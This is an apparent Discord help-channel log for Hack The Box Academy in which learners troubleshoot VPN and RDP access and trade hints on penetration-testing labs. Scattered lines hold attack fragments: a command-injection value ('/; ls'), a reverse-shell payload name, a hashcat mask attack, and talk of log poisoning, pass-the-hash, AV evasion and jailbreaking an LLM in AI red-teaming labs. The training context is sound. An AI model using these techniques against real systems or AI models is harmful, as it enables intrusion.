#modules
Can I ask how you fixed this problem?
hey guys
I'm stuck at SQLi final exam , tested bunch of payloads including the HTB cheat sheet ones , but it is not working
dm me
Hello, I don't know if this is the right channel, but I'd like to do the AI red teamer path. I've started the first module, fundamentals of AI. I'd like to know how to approach this path. Is it necessary to know all the mathematical concepts perfectly or is just an overview enough? I have no particular knowledge of AI or the mathematics of data. The aim is to find out if I need to become a data scientist to do and above all understand the path 😅, Thank you in advance.
Well the AI Red Teamer path is built on mostly the understanding of AI; I believe there's a few introductory AI modules (unsure if they're part of the path)
There is indeed an introduction to AI, but as I have no basic knowledge of AI, some concepts remain a little vague.
not sure if much of the concepts get explained as I haven't done the path. Surely research/googling can yield some results ¯_(ツ)_/¯
I understand. In fact, as I was saying, I would have liked to know if I need to master all the concepts of AI perfectly, and therefore train upstream, before starting the path. Thank you anyway for your answer.
I don't have any time constraints, so I'm just going to launch it and see what happens.😅
if anyone struggles with the password attacks - pass the certificate (confusing module) dm me i can guide in the right direction, there's a lot of small details that aren't mentioned in the module
#1234357888114364508 could be good place to raise these recommendations I think?
yes ill write something there later today
Hello, yet another post about the famous Exploiting Web Vulnerabilities in Thick-Client Applications but how are we supposed to get rid of compilation error of ClientGuiTest.jar when we have never touched java ?
I'm hardstuck :/
At this point of the section
javac -cp fatty-client-new.jar fatty-client-new.jar.src\htb\fatty\client\gui\ClientGuiTest.java
And debugging on laggy windows rdp session is a pain in the ass
hello guys any hints for this section I'm stuck on it for days /module/171/section/1692
Which one is Module 171? And which section do you work in?
intro to nosql injection 1692
Which section is 1692?
skill assessment 2
Okay, so what exactly is the problem?
I do need a little bit of information to help you.
I see that the challenge is giving some errors but I get no nsql-injection indication or errors
Look closely at the error messages. Bit by bit.
can someone give me a hint about Linux Local Privilege Escalation - Skills Assessment, the method to get initial foothold without ssh password. What i did is i know the webservice, the domain, the version of the web, the port. However, i don't know which exploit can lead to initial foothold. Thanks a lot
#LFI
how to solve assessment in CWES
DM me if you want
Which assessment?
Hi, i'm sry to ask but can someone help me find the version of gitlab on the **Gitlab - Discovery & Enumeration** section from the Attacking Common Applications module :
i found the second answer but i cant find this one i searched everywhere 😭
if I remember well, gitlab version is visible in the /help endpoint but you have to be authenticated
Hi
Access to the lab environment to complete this part of the lab will be a bit different. We are using XfreeRDP to provide us desktop access to the lab virtual machine to utilize Wireshark from within the environment.
We will be connecting to the Academy lab like normal utilizing your own VM with a HTB Academy VPN key or the Pwnbox built into the module section. You can start the FreeRDP client on the Pwnbox by typing the following into your shell once the target spawns:
Code: bash
xfreerdp /v:<target IP> /u:htb-student /p:HTB_@cademy_stdnt!
You can find the target IP, Username, and Password needed below:
Click below in the Questions section to spawn the target host and obtain an IP address.
IP ==
Username == htb-student
Password == HTB_@cademy_stdnt!
Can someone help me with this
What is even your question?
Dude
xfreerdp /v:<target IP> /u:htb-student /p:HTB_@cademystdnt! I used this
Still not seeing a question
Ok
Me either
yes, but they dont provide any creds
Answer the question(s) below to complete this Section and earn cubes!
Target(s): Click here to spawn the target system!
RDP to with user "htb-student" and password "HTB_@cademy_stdnt!"
- 2 What was the filename of the image that contained a certain Transformer Leader? (name.filetype)
hacker:Welcome but i doesnt work
@hidden ledge @storm elk
This is
oj
Section is this: Packet Inception, Dissecting Network Traffic With Wireshark
We can't answer HTB modules questions at your place, we can help if you are stuck at best
I know
Because it has to do with connecting with this
xfreerdp /v:<target IP> /u:htb-student /p:HTB_@cademy_stdnt!
It tells me to use a vpn file to my machine
Ok this is a bit more clear
This is what I've done
So have you downloaded the vpn file and connected to it?
But then it tells me to connect me to 172.16.10.2 with the following credentials
Yes
And it doesn't work
Can you share a screenshot or so
Damn
Okay
The IP you provided is not the one you should connect to
IP provided by htb are of format 10.x.x.x
The ip displayed when you click on "spawn instance" just above the questions
Just like this.
You are actually talking about the internal network ip. You will have access to it once you are connected to the instance.
No worries 🙂
Where can I find the official cpts preparation track (list of practise machines ) ?
I want the same thing for CWES
There is no track for CWES.
Boxes has a different goal than CWES
Where does weight help in an activity?
Hello, for some reason, on the Windows fundamentals module, I try to connect to the vpn using the way I always have but now for some reason the vpn won't ping back
I've tried everything, even GPT couldn't help me.
Also the target IP addresses are not spawning.
ok the IP target spawned finally, I try to connect to vpn and it says "initialization sequence complete" but it won't ping the target IP
it should be related to the module you are doing, what module is it?
privilege ladder
which box is it?
It's an activity from the "beginner" academy.
do you have a link?
so I'd expect that the answer is based on details on that page, so either ssh keys exposed or sudo, did you check those things?
also download and run linpeas, that should help you identify a way in
Linpeas outputs a loooot of useless info, its a shotgun tool
true but it will find it, although that page has the info needed
While correct, its easy to miss in Linpeas
And I believe its a public_ip:port, making file transfer all the more difficult. Since their containers are more locked down
[Ik scp works]
or copy paste
then what should I do
Thank you so much, thanks to your help I was able to
the beginner modules especially will have what you need on that same page
On this module https://academy.hackthebox.com/module/49/section/454 I am using a Kali Linux VirtualBox, I've tried connecting to the vpn the same way as before but nothing seems to ping back. Also, I try running this command xfreerdp3 /v:<targetIp> /u:htb-student /p:Password and the Windows desktop will pull up but then it shuts off in 5 seconds.
am I missing something?
Are you sure you do not have a Pwnbox instance still running on Academy?
Multiple connections with the same OVPN config will "fight" against each other
Also, check out the last couple of points in this help article, they have helped others in the past
https://help.hackthebox.com/en/articles/9297532-connecting-to-academy-vpn
All you need to know about the VPN Connection for Academy
no pwnbox connected
Do you see your VPN connection "resetting" frequently in the logs, or is it stable?
I have been having this exact same issue and was about to ask the same thing
Connection appears to be fine
Wait a minute or two, do you see another "Initialization Sequence Completed" message?
if i try to ping the target IP, nothing comes back
Okay, in my case I can ping the target IP fine, RDP works fine from the PwnBox, HOWEVER, the moment I use my own kali VM via the vpn to try to RDP to the target machine instead of the PwnBox, I am unable to do it. I have tried with xfreerdp, rdesktop, and remmina and none of them work no matter which security settings I have configured.
Ok one thing at a time 😅 but sure, @hollow wind is your Pwnbox still running? If so, terminate it
@lucid forum which VPN server are you connected to?
academy-regular.ovpn
dude someone in the support terminated my plan and I did not tell him to do that
this is rude
Please speak with support, I can't help you with that
Need some help? Learn how to reach the support team on Academy.
okay
Oops, sorry for butting in, I can wait my turn 😁 . BTW, my pwn box is not running at the same time as my kali VM but in the meantime let me try again just to make sure.
for host 1 on shells and payloads skills assessment how do we get to know what payload type to give to msfvenom
in this case we gave|| java/jsp_shell_reverse_tcp||
but there r many more java payloads compatible with war so do we experiment with all ?
In your ovpn file, the line that starts with "remote", what is the hostname there please? 🙂
not sure what you mean srry lol
Ok, it's fine
I use sudo openvpn academy-regular.ovpn command in kali linux machine
I see you now.. your connection keeps on reconnecting, suggesting you may have multiple openvpn clients running at the same time
Easiest option, reboot your VM you're working from and reconnect fresh
Sometimes openvpn can drop into the background (the client process), resulting in multiple clients trying to connect at the same time
You could try sudo killall openvpn first
and then reconnect
I tried sudo killall
Can you start the openvpn client again please?
Ok I see a ping response from you now
Are you still working on those? I just finished it if you had any questions.
I restarted the machine, openvpn is running
Can you stop and start the target perhaps? You're still on the same VPN server..
Sorry, doing the best I can here.
all good, you want me to close the vpn and reopen too?
No the VPN can stay open
You'll want to stop the target on the Academy
and start it again, then try the new IP
target IP is taking awhile to restart lol
It can sometimes, it'll get there
Did you just try to spawn it again @lucid forum ?
it finally came up and still no ping response to target
IP ending in 162?
Strange, route is stable between you, the VPN server and then to the machine.. Honestly I'm not sure what the issue is.
Can you ping 10.10.14.1?
yes
And there's no conflicting route locally with the 10.129.0.0/16 subnet?
I mean you should've seen errors in openvpn if there were
I'm sorry.. I've no idea why you cannot access the target IP from your VPN connected Kali instance.
The routes look to be fine, the VPN can reach you, and it can reach the target
All I can say is, please can you speak with support.. sorry, I thought we'd have this fixed by now
Hey goblin, you got a sec to check out this issue im running into?
oh lol
I just like to try to help when I can
Support is your best bet, sorry
No worries, ill reach out to them 👍
hey, is anyone's guestmount command working? The command seems to be missing for me even when reinstalling it
anyone having problem with this section?
https://academy.hackthebox.com/module/134/section/1186
The target takes too long to load in my browser
and when I curl I dont get the same result in the section
because there's a missing link to get the results; you should be able to go into the network monitor/browser devtools -- find the request for 'welovefonts' -> blacklist that and it'll load just fine
tysm!!! was that mentioned in the section ???
ive blocked it in my browser but same curl result
how can i block it in curl
the issue with curl is a separate thing; i've led you to part of the answer (network requests) investigate that further 😉
(note it's not a bug with curl, curl doesn't care about fonts)
I'm experiencing an error in purchasing a cube. It says that my transaction was declined.
"Transaction was Declined, please contact support."
Even when i use my other card. It pops up an error
For billing issues, you'll need to reach out to support @worn swallow
Thank you sir
Billing is something cannot help you with on Discord, apologies
Whichever is the appropriate one for your operating system
For windows I am referring to
There are so many different .net and there is also native and trimmed
i just yoinked the inveigh.exe that's on the C:/Tools of the target machines
protip: copy the tools from the machines on htb
...or do that
well... if they were tested with that version :D
Yes but I need to know which one to download so that I can transfer to the target machine because in real world it won’t be preinstalled on C:/
they're different releases so like g0blin said you need to pick what works for your os and architecture
nativeaot being smaller to me suggests it uses libs available on the target
with trimmed-single being large being inclusive
That may be completely incorrect however
Experiment and test I suppose
well... once you yoink it you don't need to re-yoink it
(this is assuming you're using your own machine)
I didn’t get that . I don’t really understand what yoink means
yoink = steal/pillage/take
Did you shout or something Marcie? I didn't think my answer was completely stupid 🤣
I took the Inveigh.exe that's on the C:/tools/ folder from the windows modules
huh what? can't hear you, speak up. But no, your answer wasn't completely stupid, because it provided the larger framework outside of academy
I believe the port forwarding cheat sheet about reverse port forwarding has a mistake
This is the command they give: `<InternalIPofPivotHost>:8080:0.0.0.0:80 user@<ipAddressofTarget> -vN`
And this is the description : Reverse SSH tunnel from target host to attack host. Traffic is forwarded on port 8080 on the attack host to port 80 on the target.
I believe it’s the opposite . The description does not make much sense anyways
Any nudge towards first question in Windows Lateral Movement Skill Assessment, what should I be looking for? So far I tried ssh, rdp (not on default port as well), web browser PS, smb, dcom but no luck so far
Enumerate
as in, enumerate services (did that) or websites?
You have been given a set of credentials, if you enumerate carefully you will find where you can use them
And the answer is within the explanation in the initial question you've asked
Module is above tier 0 @chilly night, please try not to spoil.
hi, on LINUX PRIVILEGE ESCALATION > Linux Local Privilege Escalation - Skills Assessment
can someone help me in the right direction to find flag5.txt? i have flag4.txt answer already but i have no idea what the next approach is
is it got to do with sudo -l approach? i tried that but does not seem to work
you did not solve it yet-_-
Network requests, look for the one to the ip:port :) it'll bridge gaps
ha
I didn't understand🥺
is that a module
Sometimes the examples from gtfobins don't work, and you may need to modify the payload
Hi. I'm studying the Bypassing Web Attacks -> Basic Authentication module (https://academy.hackthebox.com/beta/module/134/section/1175). From the pwnbox I'm trying to execute "curl -i -X OPTIONS http://94.237.120.137:45455/" but i don't get server accepted methods:
HTTP/1.1 200 OK
Date: Fri, 12 Dec 2025 08:42:58 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 1210
Content-Type: text/html; charset=UTF-8
[body response]...
I've already tried to restart both pwnbox and target without results. Any hint?
The response header should contain: "Allow: POST,OPTIONS,HEAD,GET"
you can DM me
got it thanks
solved thanks @coarse pine
Hi, I'm on module Attacking Authentication Mechanisms -> OAuth
In the module Attacker Server (attacker.htb) was mentioned. Also in the target system spawned it shows
OAuth Client Routes: here
OAuth Resource Server Routes: here
OAuth Authorization Server Routes cannot be interacted with directly
Attacker Server (Remember to add the port): http://attacker.htb:PORT/
Is the attacker server accessible, if so what is the port? or I should be hosting the server?
can you give the section link
sorry can't help in that
no worries. but do you understand my question? Not sure I was clear
I think you have to add the port and the domain name in /etc/hosts?
The full environment is available on the IP and port provided
You don't need to host anything on your Pwnbox or machine
got it . thanks. Module instruction wasnt clear.
thanks . you are right .
wow!!
make me a mod
Not my call
🥺 .
Anyone I can ask about 2 qs for the Wi-Fi Penetration Testing Tools and Techniques modules ? https://academy.hackthebox.com/module/298/section/3962
Perform an attack against the Wi-Fi network "Inlane-Management". What is the password obtained for user "peter"? and Connect to the "Inlane-Corp" Wi-Fi network and navigate to the gateway at "172.27.0.1" to retrieve the flag. Submit the flag as your answer. in particular
Can someone help with the Intro to Windows Evasion -> Static Analysis. Cant complete the first evasion challenge. Windows defender keeps identifying it
I copied the code directly incase i messed up somewhere, I ran threatcheck and it seems to be triggering on my AES calls, so I modified the decryption function to hopefully bypass any static signature but nothing is working.
ThreatCheck shows some wall of text but not sure what exactly inside it is triggering, especially since ive changed it a few times
The 'options' header isnt set to respond
To simplify, look at the network request with the browser dev tools when you click on 'documents' from the home page
Port doesnt go in the hosts file, ever
You ve done the 2 new wifi modules ?
hey Mrcieleee
I will start my first CTF challenge
Haven't touched any of the wi-fi ones
Then talk to them
Just roll with it
If this is related to a CTF and not a module, this is not the channel to post this content.
good morning. very new to this and learning which chat I should go to for this. I am in the HTTP request section and asked this: Send a GET request to the above server, and read the response headers to find the version of Apache running on the server, then submit it as the answer. (answer format: X.Y.ZZ) not certain what to put in. I have tried GET ip of server and ip with port#, but can't seem to get the answer
You can use curl -I to get the information
In your response you should get something like server:apache/x.x.x
this isn't the appropriate channel for shenanigans; #general
still not accepting though
look closer at what the format is asking you
also don't post answers
it's just asking for the version number format
oh okay sorry
I did that but still didn't take
dm me with what you submitted
could you dm me instead. I am having too many issues trying to figure this out
I genuinely don't care if you don't place high, then that's more on your team than it is on you as a person.
can someone help me with the Applications of Ai in Infosec module?
i am facing issue in getting the flag for jailbreak 1(even after jailbreaking the llm)
can you guys please help me over it?
https://academy.hackthebox.com/module/297/section/3416
Hello Everyone. Im working on the Manipulating the Model https://academy.hackthebox.com/module/294/section/3342
I don't understand how to answer the questions. I can manipulate the model by changing the message, is the model supposed to return a flag or something?
Yes, you will be presented with the flag if you complete the task successfully
so we have to wildly guess? gotcha
okay I figured out the first two, but the last question
Exploit a flaw in the web application to steal the trained model. Submit the file's MD5 hash as the flag.
with the hint to look in the html code
I dont see it anywhere
nvm, I see it now
a quick question in the Attacking Common Services -Attacking DNS they are explaining the ettercap method .. which can only be done locally via lan right? since we are connecting via a vpn thats not possible right?
there is a typo at subbrute part in attacking common services ive marked them
#1234357888114364508 is the place to post for corrections
"Attacking FTP" box Q 1, on which port FTP service runs on.
You type 21, and get wrong answer. Very funny.
2121
yep
I am cooked
Gordon ramsay would be proud
whois Gordon.ramsay
World renowned Chef 
silly
Hello guys, i would like to ask about problems with submitting the flag as the answer. What else can I do besides resetting the machine? I’ve been trying for a while and looked for other possible answers, but I think there might be something wrong with how the flag submission is being handled.
The answer you have is not for the section you're working on
Maybe you went a bit too deep too quick 😅
Or you have a space
At some point, that's for sure 😂
it was the intro to pen testing module and basically just said use what you learned, which was basically just using netcat to see what was running on port 22 (obviously ssh), but the versions are different so it throws the answer as wrong.
You had to spawn your target
That is the IP and port you need to work against
22 is indeed the usual SSH/SFTP port, but your target may not always match the ports in the content due to how we host the interactive portions
Take a look at where your Target IP is specified, just above the question
🙂
Ahh. That makes much more sense.
Thanks
No problem!
@fierce oyster Please take care not to post answers
Thought it didn't matter since it was an Optional module, that also had a button to give the answer right next to it....
Yeah but that may spoil it for some
i just wanna say the parrot machines on the "shells and payloads" module are really slow. also on some other modules
not fun to use
VM is always going to be a better experience
i usually use my own vm but for this module you have to use the ones given, i think
ahh yeah there are some like that, you can usually pivot through still though
whats your favourite way to pivot other than ssh
favourite way to port forward rather
In password attacks module, section pass the hash why was I able to view the shared resources of david when used mimikatz from windows but was not able to view shared resources of david when used impacket-psexec for david it says access denied @fathom pendant @cloud urchin
Don't @ people; the simple answer is- you're connecting to the dc, which is a separate machine.
can u explain please when I connected to david's account, I am basically on same machine just my authentication has been performed by DC as the user david and same goes for impacket then how am I on a separate machine
if I am in AD environment does it makes any difference because I am essentially having privileges of the same user david in both the cases when using mimikatz I am already an admin and then moves laterally to david and using impacket i just hops from my linux machine to the user david ??
the file you're looking to enum with is on the DC; localadmin != domain admin
you'd need to pass along the hash through a connection like a tunnel/pivot
Thank you
Hello all !
Anyone available for some questions about the SA of Advanced SQL injections please 🙏
Hey everyone, I'm on the final question of the "Pass the Ticket from Linux" module. I've successfully authenticated as the LINUX01$ machine account, and klist shows a valid ticket. However, I'm blocked from there when trying to access the \DC01\linux01 share. Any hints on what I might be missing? Thanks
you can dm
Hello everyone, I'm stuck in the module called "shells & payload" in the section called "Infiltrating unix/linux", the payload of rconfig as shown in the section is not working, can anyone help me?
Did you create a listener on that agent correctly? You can DM what you setup.
Yo need a hint with Windows Lateral Movement SA Q1, I have enumerated all port and try ssh, rdp , smb and dcom but no luck so far
Could anyone help me with Crackmapexec skills assessment Q3 please?
You might want to check your nmap results again.
The web port part ?
Use the account from the previous question to begin your enumeration process over again.
Not sure what you identified in your scan, so if something was in your results that was covered, I would focus on that.
If you would like to discuss more information that is potentially spoiling, ask to DM first, don't just DM, as I will most likely just ignore your DM and refrain from helping you further.
Hey all, I'm doing the Footprinting Labs - Medium, and I've enumerated quite a few things thus far, i.e in short, nmap to view ports opened, found the 'xx' credentials and tried connecting with ssms with various connection options and failed, I can RDP into the target with the account credentials I also found, I tried other tasks from the module with no luck.
I can search past messages on this topic, but i don't want to as I might see the direct answer, and I just want a nudge in the right direction.
consider what those two letters stand for to be able to run as
thank you. I've got the foothold now. and I feel really silly about how I could have gone about it. I did do a runas before, but just didn't think of the xx creds.
i think the 'hint' on the Q points at this
I'm doing the Finding Files and Directories section of Introduction to the Windows Command Line, on the second task it asks me to find a file named waldo.txtx, i've tried using where with the /r switch to make it recursive but i still haven't got any result, may anyone help?
i was able to where just fine. dm me
What exactly does the run as command do ? It lets you run commands as another user ? Also this applies only to network resources such as shares or also local recourses e.g. local directories such as administrator’s desktop
runas is like sudo; runas also, in the context of windows, allows you to run things as a specified user, they can be a local or remote user https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771525(v=ws.11)
sudo also does the same thing; sudo -> switch user and do; the default for sudo is root but you can use -u to specify a user
so sudo -u someuser /bin/bash (if you have the permissions to run, as that user)
@dull solar your message was removed because your screenshot contained an answer
So can I crop and resend?
it helps to provide the module and section name
Module: Network Traffic Analysis Section: Fundamentals Lab
||"How do you start a capture with TCPDump to capture on eth0?"||
i'll check bc i believe i did that one and i think it's a case of formatting
Oki
no sudo
My image had no sudo and I removed spaces from the side. Still no
Ty
Does anyone have a suggestion for how to proceed with the DnsAdmins on Windows Escalation? I didn't see anyone reply to my last request, and I've been stuck at this for like a week now. after loading the adduser.dll it lets me add netadm to the DnsAdmins group, but I still don't have privilege to grab the file from the Administrator directory
I tried using mimilib.dll like it says further down in the page, but I don't think it's clear what to do with that here. I tried loading it in the serverleveldll registry, but it fails when I try to do that, so not sure what the guidance actually is meant to convey
DM me
Thank you for your help! It turns out I was doing it right, just needed the right way to access the file once I had permission.
Hihiii, can someone help me with password attacks skill assessment?
Anyone available for DM on the Active Directory BloodHound module? I have a question on the "Nodes" Section question 1 (To which computer is user Sarah, an administrator?). I have the answer, but I'm not seeing something in BloodHound that I expect to see.
[NEVER MIND! SOLVED!] Hello, I am doing the Manipulating the Model module from the Introduction to Red Teaming AI track. I need to download the code/files from a Resources section but can not find that section in the page, where is the Resources commonly found?
Howdy! I am currently doing the Detection & Analysis Stage (Part 1) section in the CJCA path. I am attempting to answer the second question which says, "Assign the Mimikatz alert (shown in the section) to yourself in TheHive, and go through the description and summary. Provide the username of the person who executed the Mimikatz tool. The answer format is "domain\user_name." I have a few times put the following in the browser in Pwnbox: [IP]:9000 but the TheHive page never appears. Is anybody having the same issue?
it can take a few minutes for it to spin up fully, i generally try and give ~5 minutes after spawn if something is dependent on a web interface or some other service
Yesterday, I waited and waited..probably 20 minutes or so..refreshed the browser...nothing! I am trying it again today and no success so far.
are you doing http or https?
also of course dropping the brackets so something like https://10.129.x.x:9000
http. Of course, there's no brackets. I even sent a ping to the IP and it connected so I know the IP works. I did test https yesterday and it didn't work. Let me see if it works.
I put in: https://10.129.228.226:9000/ and it said, "Secure Connection Failed."
Ah! I see the problem! The browser was forcing it to use https. I reverted it to http and it works.
Ah yeah that'll do it
it should be /; ls but it doesnt work
dm me
hello can someone help me answer this question i am stuck here for about days and i didnt find the answer : Assign the Mimikatz alert (shown in the section) to yourself in TheHive, and go through the description and summary. Provide the username of the person who executed the Mimikatz tool. The answer format is "domain\user_name." its from the incident response lab
Inlane_ is a prefix and the password should be at least 10 characters.
So you can try -a 3 'Inlane_?a?a?a'
You can use backticks ` for command stuff
Or put a \ before to escape it
Thanks
I am getting this exact same error. I can access the webpage at port 80 but the /nibbleblog url returns the Net::ReadTimeout error. Were you able to resolve it? I tried resetting the target a couple of times but i get the same error.
i was able to solve FootPrinting module medium and hard labs with one hint for each one, is it good?
anybody else having problems with htb vpn session timing out
im close to losing my mind
as if learning this stuff isnt hard enough
it's good; the thing to take away (if you feel you need to use them) from hints is how you should think about the scenario differently
it's easy for the medium lab to overlook something that's obvious in hindsight
actually, it was my mistake for medium lab, even though the thing i missed mentioned multiple times through modules, all my focus was on services, so i missed it, it is the same for hard lab
too much focus on commands
if it was bad to use hints, they wouldn't exist
Going through the SIEM module, it is said that the following image is a demonstration, but there is a codeblock instead of an image. I can understand what the goal is, but is this intended?
#1234357888114364508 ; if this is on beta -- switch back to normal
it's using the markdown syntax of linking an image so... no it's not intended to be a 'codeblock'
Oh yeah, it was the beta issue :D
i'm sure you can grab the image from https://academy.hackthebox.com/<insert link here>
right, they are pretty useful, actually i think i did this module's lab pretty good this time, because this is my second time going through CPTS, and first time didn't take notes, gone through all the modules very fast and didn't even understand most of the content.
it's all in how you view it, it's ok to need a bit of a push -- and going through it again not as something to complete, but something to learn is definitely useful to your mindset.
i am squeezing out all the knowledge from the path
For the module Information Disclosure what is the flag: "After executing an introspection query, what is the flag you can exfiltrate?" I have done all modules and the Skill Assessment, but i dont understand which could be the answer
@fallow sable the module is above tier 0; don't paste anything like that. make sure you pay attention to ports
Oh, I am sorry - I’ll review the module number before posting next time. Should I want to ask a question and it is above tier 0, where do I ask it? The CPTS section?
I’ll delete my original post
you can ask it here; and the same rules apply to other channels. Just don't spoil information
I understand, thanks
Anyone tried installing Nessus recently? Guidance in Vulnerability Assessment module doesnt match the installation route now.
For example this is the nessus installation options - there isn't an essentials? Unless im going mad
They have nessus installed on a box for you to use if you don't want to go through all that I think.
also i don't really remember, but you may just be able to pick one and move through the installation and if it asks for a key or something you skip or don't do it, then it just becomes free version maybe?
they do still have the essentials version
yeah I picked a couple and it rejected the key, and then went into Nessus Manager was only one that accepted the key, I signed up for Essentials as the docs online suggest. Weird one - I have no functionality like new scans 😄
Unfortunately the module lab isn't enough, need this on my machine as I want to do this for my report
Does anyone else suffer with a super instable RDP Connection to Windows machines (like in Windows Privilege escalation). Although this only is the case when using the VPN (in the PWN Box everything is fine). I already went through all of the EU VPNs and there is no improvement
presume youve switched tcp to udp as well ?
yes
when you say unstable ,does it kick you off the connection every now and then ?
it kicks me out or sometimes doesnt even establish a connection
I get this as well, have got it across many modules, didnt happen for me in the exam tho
It is extremely annoying
yeah i heard the exam environment is stable
but yeah this is really annoying and it basically takes longer trying to get a connection, than actually completing the task for the section
Sometimes ive found my keyboard pasting can be the issue, +clipboard has differing results sometimes I try with and without /drive: etc, crashes sometimes when transferring files, sometimes it crashes when running scripts, ofc when you eventually get back into the RDP window, nothing was impacted and scripts still run etc
Although instead of tempting fate and switching rdp between users, I tend to use runas /user:user if the target user is on the same device/same domain. Otherwise yeah have to switch and roll the dice again
the clipboard thing is also interesting. I noticed that you sometimes need to insert twice
then it works
i feel that
yeah noticed that too, interestingly if you are pasting into a powershell window, make sure you are not tabbed into the RDP window (like its not opened/active) then if you right click the pws window and paste, it most often pastes first time. if the rdp window is active, it fails least 70% of time 😄
Step 1: Read the blurb at the top of the module page, don't skim read - it gives you pertinent info! Wow. Could have saved myself two days of testing.
hey can someone help me please im about to lose my mind. ive been trying this since 5 hours with no solution
im trying to convert to a tty shell
what am i doing wrong
normally the next step would be fg in foreground
Is that for an academy module, or what?
Ok, best to include the module name when asking for help 🙂
ok yeah will do but should be a basic operation upgrading the shell no?
Ok, fair enough - I was not aware it was included there.
No, I'm staff, was just advising to include information about what you're struggling with, specifically the module name
It helps others to help you. I'm afraid I'm unable to help with content
So I don't think you can just bg/fg like that in an upgraded reverse shell
It's "upgraded", but still not a true shell
looked up stty raw -echo in this chat and the first thing i saw is that it's a common problem with kali/zsh
stty raw -echo; fg is the common solution to the problem
takes notes
That's not mentioned in that section though, like stty as a part of the shell upgrade process
it's in the 'types of shells' section from that module though in the module it's written as
www-data@remotehost$ ^Z
MarcieLee@htb[/htb]$ stty raw -echo
MarcieLee@htb[/htb]$ fg
[Enter]
[Enter]
www-data@remotehost$
g0blin was referring to the 'upgrade' part
thanks i will test that now. do you recommend using a different shell than zsh ?
zsh is fine, just gotta learn its quirks
Thanks for clarification, never gone through using stty when upgrading shells in the past, good to learn.
Was focused on the mentioned section too much, mb.
np i always forget about it too, had to look it up bc it trips me up (i never really bothered with the upgrade)
damn really makes me question like how come you guys never had to do this ? are there better ways ?
i just did the python upgrade but didn't bother with the stty part
i, also, don't use kali lol i use parrot which uses bash as the default shell -- not zsh
do i always need to download a new connection file for vpn when doing a new module ?
Generally no, unless you are changing VPN region
ok thanks
I am stuck at Nibbles - Web Footprinting from the Getting Started module. I can access the target in the browser and can see the /nibbleblog reference in View:Source. However when i try to run whatweb on the target, i get a weird timeout error - Net::ReadTimeout error. I have seen references to this error on this forum and elsewhere with no resolution. I have tried resetting the target a few times to no avail. Can someone shed some light on this issue?
I have the Silver Annual subscription. I am not on the VIP plan. Does this have anything to do with this? Thanks !
VIP and Silver Annual are on separate platforms, so no
send the whatweb request in here
maybe typo ?
Hey guys! Good evening! Im on system information on the academy, do I have to download the VPN connection file to ssh into “htb-student” password “HTB-@cademy_stdnt!”
Im running on a mac m3, so idk how i would do that, unless i need to connect to a hypervisor that is running linux etc… im assuming thats what i need to do?
VM is probably going to be the best way, yes. parrot/kali are good. you'd need to connect to the VPN to access the private subnet.
Ah ok, that makes sense now, i started an instant on the website, I thought that would work, but when i tried to ssh it kept asking for a pass, and im like i never made one… how do i get it?
oh yeah, you can use the pwnbox too
but you only want to use one, the vpn or the pwnbox. one or the other, not both at the same time. they use the same IP
within the pwnbox you can open a terminal and ssh
I dont necessarily want to google it, cause that would be cheating
┌─[user@parrot]─[~/work/nibbles]
└──╼ $whatweb http://10.129.218.33
http://10.129.218.33 [200 OK] Apache[2.4.18], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.129.218.33]
┌─[user@parrot]─[~/work/nibbles]
└──╼ $whatweb http://10.129.218.33/nibbleblog
http://10.129.218.33/nibbleblog [301 Moved Permanently] Apache[2.4.18], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.129.218.33], RedirectLocation[http://10.129.218.33/nibbleblog/], Title[301 Moved Permanently]
ERROR Opening: http://10.129.218.33/nibbleblog/ - Net::ReadTimeout
I just tried this using pwnbox and it works just fine. My own parrot VM (via academy-regular.ovpn) is erroring out.
Im stuck on the academy, page 6 of linux fundamentals,
What is the path to the htb students mail? Can i use google for this?
“What is the linux file path for mail?”
But can i do this without google :/?
am i missing something in the lesson?
any nudge for attacking ai - application and system skills assessment?
i've got the ||platform, password|| already, and tried every function that I thought would work to make something potentially show up in the logs. I've also tried things like sql injection and command injection, but to no avail. It looks like it could be ||LFI|| but that failed on me as well
Have you terminated your Pwnbox instance before connecting on your VM? Do you see any errors or warnings in your openvpn console on your VM when connecting to the VPN? Have you tried terminating the target and re-downloading your VPN config and connecting with that fresh config? (I don't think the last should be required, but just a suggestion)
@ocean night actually i never used pwnbox until now. Everything upto this point worked just fine using my own parrot VM. I just wanted to narrow down the possible causes and thought of trying pwnbox to see if the target was an issue or something else. I have terminated the target several times but it has not worked. I'll try downloading the VPN config again.
You can use Google for it, however, don't forget to establish an SSH session with the target
OSI, on the other hand, is a communication gateway between the network and end-users. The OSI model is usually referred to as the reference model because it is newer and more widely used. It is also known for its strict protocol and limitations.
Im pretty sure TCP/IP is more widely used.
This is Introduction to Networking , section Networking Models
Yes you can. I used Google for that task. I didn't google the answer though but I found something related.
And I thought to myself if this command does this why not try it for this task and see if it'll work.
It did and I got the path.
In the assessment part of broken authentication is it designed to redirect in the /login.php despite having the OTP?
nvm I was able to figure it out.
Module: NTLM Relay Attacks
Section: NTLM Cross-protocol Relay Attacks
Question: Use impacket's SOCKS server to hold NPORT's relayed connections and abuse them to access the MSSQL service at 172.16.117.60; query the 'flag' table within the 'development01' database and submit the flag.
I keep getting this error:
Connection against target mssql://172.16.117.60 FAILED: [('SSL routines', '', 'no protocols available')]
Any help?
nvm fixed it.
Module: Sqlmap Essentials
Section: Attack Tuning
What's the contents of table flag6? (Case #6)
i solved the question, but i was just confused because i thought i solved it in a different way, i only used level and risk and other options without using prefix, but still got the flag is it normal? or i should've used the prefix?
Ty 🙂
U welcome
I have a question about log poisoning. Adding (somehow) a php payload to a log file e.g. /var/log/nginx/access.log and then we are able to request that file (through LFI) why the php code will be executed? This file is not .php file so the web app shouldn’t read just a text?
I'd advise reading the first paragraph of that section again 🙂
You can poison the log in a myriad of ways. If the server is capable of executing php code, then you can poison with php
Hey on the module "Introduction to Windows Command Line" on "Command Prompt Basics" , the answer to the question is not working.
"In what directory can the cmd executable be found"
Ive answered "System32" "system32" and always gives wrong answer.. am I missing something? Thank you 🙂
Hey, does anyone know why this answer is incorrect? I'm assuming its some strange formatting I'm missing, as has been the case throughout this module.
It helps to provide the module and section name for others to sanity check you
Ah apologies. It's Networking Foundations, section 10, question 6 :)
Sec, ill check what i put in
Thanks :)
Also section name not #
Ah, network Security
I cant be fucked to count the sections lol
